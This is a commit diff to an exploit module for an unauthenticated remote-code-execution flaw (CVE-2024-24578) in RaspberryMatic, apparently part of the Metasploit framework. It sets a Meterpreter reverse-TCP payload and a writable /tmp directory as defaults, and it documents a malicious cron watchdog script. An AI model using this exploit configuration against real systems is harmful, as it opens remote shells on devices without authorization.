added default options and updated documentation

documentation/modules/exploit/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.md

@@ -108,3 +108,5 @@ meterpreter >
 ## Limitations
 You have to wait maximum five minutes for a session to allow `cron` to run the malicious watchdog script
 containing the payload. Just be patient and wait for the magic to happen ;-)
+Another limitation is that the root filesystem on RaspberyMatic image is mounted read-only, so you need to set the
+option `FETCH_WRITABLE_DIR` to `/tmp` (this is mounted RW) otherwise the exploit will fail.

modules/exploits/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.rb

@@ -49,7 +49,11 @@ def initialize(info = {})
             {
               'Platform' => ['unix', 'linux'],
               'Arch' => [ARCH_CMD],
-              'Type' => :unix_cmd
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/linux/http/aarch64/meterpreter_reverse_tcp',
+                'FETCH_WRITABLE_DIR' => '/tmp'
+              }
             }
           ]
         ],